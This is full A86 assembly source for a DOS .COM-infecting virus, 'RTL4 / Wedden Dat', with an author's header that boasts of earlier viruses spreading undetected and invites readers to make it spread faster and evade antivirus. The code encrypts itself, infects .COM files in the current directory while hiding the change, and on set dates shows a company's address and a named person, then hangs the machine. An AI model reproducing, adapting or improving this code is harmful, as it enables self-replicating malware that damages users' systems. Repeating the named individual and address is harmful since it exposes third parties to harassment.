home *** CD-ROM | disk | FTP | other *** search
- ;******************************************************************************
- ;
- ; RTL4 / WEDDEN DAT... VIRUS
- ;
- ;******************************************************************************
- ;
- ; "If a weaking linkage found, eliminate...
- ; Hear the cities fearfull roar!"
- ;
- ; Now in front of you lies another source of a virus. It is not a very good
- ; one, but, as you might say, a virus is a virus. After my wake at the PC, I
- ; created several viruses, like:
- ;
- ; Deicide / Glenn
- ; Morgoth
- ; Breeze
- ; Brother
- ; Commentator I
- ; Commentator II
- ; Spawnie
- ; Xmas
- ; 1St_Star / 222
- ; T-1000
- ;
- ; Well, I bet you think this is a whole lot, but some are minor variants, for
- ; which I don't have the guts to publish the source code. I have to admid,
- ; Deicide and Morgoth have spread very well. I uploaded them to a BBS and it
- ; was downloaded several times, and it is not detected by antivirus program yet.
- ; Deicide is now detectable, but that was my first attempt to make a virus.
- ;
- ; This virus is a Non-Resident Direct Action .COM Infector.
- ; It only infects files in the current directory.
- ; You can recognize a infected file simply, the 4th byte is a '*' (just like
- ; the 1St_Star virus). It is inactive from January till May and starts
- ; replicating from May. After July, every Wednessday after the 21st the
- ; program will hang the system, showing the address of RTL4 Joop v/d Ende
- ; Productions.
- ;
- ; Disclaimer : This program is like all other virus sources only for
- ; educational purposes and should not be given to irresponsible hands
- ; (John McAfee and people like him).
- ;
- ; For the criminal reader : Don't just change the text of this virus and
- ; say you made a virus. Instead use some ideas from this virus and create your
- ; own virus if you want to be nasty. Additions to this virus that makes it
- ; spreading faster and makes it harder to detect are welcome, as long as I get
- ; the new source code.
- ;
- ; I want to thank several virus writers for their support with letting McAfee
- ; and Ass. earn his money with making so many updates of SCAN...
- ; Here they are : Bit Addict, XSTC, Dark Helmet, Dark Avenger, Nuke!, Cracker
- ; Jack and many more creators.
- ;
- ; Note to XSTC : Thank you for disassembling the Deicide virus, for I have lost
- ; the source code. Next time write a message, because I might have the source
- ; code of the virus ready, but not uploaded. It saves you time, so you may
- ; disassemble another virus (ofcourse only for educational purposes ;-) )
- ;
- ; Now have fun with this virus, written in A86 assembler version 3.22
- ;
- ; Glenn Benton
- ;
- ; "Is it truly a disembodied head lurking in the dark of the tombs of fate?"
- ;
- Org 0h ; The outcome will be .BIN
-
- Start: Jmp MainVir ; Jump to main virus
- Db '*' ; signature
-
- MainVir: Call On1 ; Get virus offset
- On1: Pop BP ; BP is the index register
- Sub BP,Offset MainVir+3 ; Calculate virus offset
- Push Ax ; And store AX (error reg.)
-
- Lea Si,Crypt[BP] ; Decryptor for the
- Mov Di,Si ; virus code. It's long
- Mov Cx,CryptLen ; for a decoder, but it
- Decrypt: Lodsb ; reduces the recognizable
- Xor Al,0 ; part enough.
- Stosb ;
- Loop Decrypt ;
-
- DecrLen Equ $-MainVir ; Decryptor length
-
- Crypt: Mov Ax,Cs:OrgPrg[BP] ; Store the 4 first bytes
- Mov Bx,Cs:OrgPrg[BP]+2 ; of the host
- Mov Cs:Start+100h,Ax ;
- Mov Cs:Start[2]+100h,Bx ;
-
- Mov Ah,2ah ; Get date
- Int 21h ; If it is a wednessday
- Cmp Dh,8 ; after July and after
- Jb NoMsg ; the 21st, it will
- Cmp Dl,22 ; will continue, else
- Jb NoMsg ; it goes to NoMsg
- Cmp Al,3 ;
- Jne NoMsg ;
-
- Mov Ah,9 ; Display the message
- Lea Dx,Msg[BP] ;
- Int 21h ;
-
- Lockout: Cli ; And lock the computer
- Jmp Lockout ;
-
- NoMsg: Cmp Dh,5 ; Is it after April?
- Jae DoVirus ; Yes - Replicate
- Jmp Ready ; No - Terminate to host
-
- DoVirus: Mov Ah,1ah ; Move DTA to a safe place
- Mov Dx,0fc00h ; $FE00
- Int 21h
-
- Mov Ah,4eh ;
- Search: Lea Dx,FileSpec[BP] ; Search for a .COM file in
- Xor Cx,Cx ; the current directory
- Int 21h ;
-
- Jnc Found ; If not exist, goto Ready
- Jmp Ready ; else goto Found
-
- Found: Mov Ax,4300h ; Get file attributes
- Mov Dx,0fc1eh ; and store them on the stack
- Int 21h ;
- Push Cx ;
-
- Mov Ax,4301h ; Wipe the attributes, so it
- Xor Cx,Cx ; is accessable for us
- Int 21h ;
-
- Mov Ax,3d02h ; Open the file with
- Int 21h ; read/write priority
-
- Mov Bx,5700h ; Get de file date/time stamp
- Xchg Ax,Bx ; and store them on the stack
- Int 21h ;
- Push Cx ;
- Push Dx ;
-
- Mov Ah,3fh ; Read the first 4 bytes
- Lea Dx,OrgPrg[BP] ; of the program
- Mov Cx,4 ;
- Int 21h ;
-
- Mov Ax,Cs:[OrgPrg][BP] ; Is it a weird EXE?
- Cmp Ax,'MZ' ; Yes goto ExeFile
- Je ExeFile ;
-
- Cmp Ax,'ZM' ; Is it a normal EXE?
- Je ExeFile ; Yes, goto ExeFile
-
- Mov Ah,Cs:[OrgPrg+3][BP] ; Is it already infected?
- Cmp Ah,'*' ; No, goto Infect
- Jne Infect ;
-
- ExeFile: Call Close ; Call File close
-
- Mov Ah,4fh ; Jump to the search routine
- Jmp Search ; again for a .COM file
-
- FSeek: Xor Cx,Cx ; Subroutine for jumping to
- Xor Dx,Dx ; the begin/end of file
- Int 21h ;
- Ret ;
-
- Infect: Mov Ax,4202h ; Jump to EOF
- Call FSeek ;
-
- Sub Ax,3 ; Calculate new virus offset
- Mov Cs:CallPtr[BP]+1,Ax ;
-
- Mov Ah,2ch ; Get system time
- Int 21h ;
-
- Mov Cs:Decrypt+2[BP],Dl ; Move the decryptor part
- Lea Si,MainVir[BP] ; with the 100ds second put
- Mov Di,0fd00h ; into the XOR command to
- Mov Cx,DecrLen ; the end of the 64K segment
- Rep Movsb ;
-
- Lea Si,Crypt[BP] ; Encrypt the virus with
- Mov Cx,CryptLen ; the 100ds seconds.
- Encrypt: Lodsb ; Merge it behind the
- Xor Al,Dl ; decryptor
- Stosb ;
- Loop Encrypt ;
-
- Mov Ah,40h ; Write the virus
- Lea Dx,0fd00h ; at the end of the
- Mov Cx,VirLen ; file
- Int 21h ;
-
- Mov Ax,4200h ; Move to start of
- Call FSeek ; the file
-
- Mov Ah,40h ; Write the jump to the virus
- Lea Dx,CallPtr[BP] ; at the begin of the file
- Mov Cx,4 ;
- Int 21h ;
-
- Call Close ; Close the file
-
- Ready: Mov Ah,1ah ; Restore the DTA to the
- Mov Dx,80h ; original offset
- Int 21h ;
-
- Pop Ax ; Get (possible) error code
-
- Mov Bx,100h ; Strange jump (but nice) to
- Push Cs ; the begin of the program
- Push Bx ; (which has been restored)
- Retf ;
-
- Close: Pop Si ; A pop which is stupid
-
- Pop Dx ; Restore files date/time
- Pop Cx ; stamp
- Mov Ax,5701h ;
- Int 21h ;
-
- Mov Ah,3eh ; Close file
- Int 21h ;
-
- Mov Ax,4301h ; Restore attributes
- Pop Cx ;
- Mov Dx,0fc1eh ;
- Int 21h ;
-
- Push Si ; A push which is stupid
-
- Ret ; Return to caller
-
- CallPtr Db 0e9h,0,0 ; Jump
-
- FileSpec Db '*.COM',0 ; Filesearch spec & signature
-
- ; Activation message
-
- Msg Db 13,10,9,9,'RTL4'
- Db 13,10,'Joop van den Ende Produkties BV'
- Db 13,10,'Marco Daas (Casting Assistent)'
- Db 13,10,'Postbus 397'
- Db 13,10,'1430 AJ AALSMEER'
- Db 13,10,'van Cleeffkade 15'
- Db 13,10,'1413 BA AALSMEER'
- Db 13,10,'The Netherlands'
- Db 13,10,10,'Wedden dat... je een virus hebt?'
- Db 13,10,'$'
-
- ; First 4 bytes of the host program
-
- OrgPrg: Int 20h
- DB 'GB' ; My initials (Glenn Benton)
-
- CryptLen Equ $-Crypt ; Length of encrypted part
-
- VirLen Equ $-MainVir ; Length of virus
- ;
- ; Sleep well, sleep in hell...
- ;
-
- ; ─────────────────────────────────────────────────────────────────────────
- ; ────────────────────> and Remember Don't Forget to Call <────────────────
- ; ────────────> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <──────────
- ; ─────────────────────────────────────────────────────────────────────────
-
